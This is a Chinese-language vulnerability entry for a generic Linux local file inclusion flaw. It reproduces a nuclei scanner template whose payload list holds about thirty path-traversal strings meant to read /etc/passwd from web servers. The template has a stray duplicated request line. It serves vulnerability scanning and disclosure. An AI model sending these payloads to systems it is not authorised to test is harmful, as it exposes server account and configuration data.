Generic Linux Local File Inclusion Vulnerability

漏洞信息

漏洞名称： Generic Linux Local File Inclusion Vulnerability

漏洞类型： 文件读取

漏洞等级： 高危

漏洞描述： 该漏洞涉及Generic Linux系统中的本地文件包含（LFI）问题，允许攻击者通过构造特定的HTTP请求路径，读取服务器上的敏感文件，如/etc/passwd。这种漏洞通常出现在Web应用程序中，当应用程序未正确验证用户输入时，攻击者可以利用路径遍历技术访问或包含服务器上的任意文件。Generic Linux作为广泛使用的操作系统，其安全性对企业和个人用户至关重要。此漏洞的根源在于输入验证不足，未能有效限制用户访问的文件路径范围。攻击者无需认证即可利用此漏洞，可能导致敏感信息泄露，如用户账户信息、系统配置等，进而可能被用于进一步的攻击活动。由于漏洞的利用方式简单且影响范围广，它被评定为高危漏洞。

产品名称： Generic Linux

来源： https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fvulnerabilities%2Fgeneric%2Fgeneric-linux-lfi.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: generic-linux-lfi

info:
  name: Generic Linux - Local File Inclusion
  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
  severity: high
  description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 33
  tags: linux,lfi,generic

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        words:
          - "Linux"
          - "Ubuntu"
          - "CentOS"
          - "Apache"
          - "nginx"
        condition: or
        internal: true

  - method: GET
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/etc/passwd"
        - "/..%5cetc/passwd"
        - "/..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5cetc/passwd"
        - "/static/..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/./../../../../../../../../../../etc/passwd"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
        - "/..///////..////..//////etc/passwd"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
        - "/index.php?page=etc/passwd"
        - "/index.php?page=etc/passwd%00"
        - "/index.php?page=../../etc/passwd"
        - "/index.php?page=....//....//etc/passwd"
        - "/../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4a0a004730450221008fa5b208c40a4d6559380ab46080a222143ade46780db976102c8ff133cb965902202736679db95d3744e75d6c62710145d203a018f61fedc5b2f7937c5e5e019f0d:922c64590222798bb761d5b6d8e72950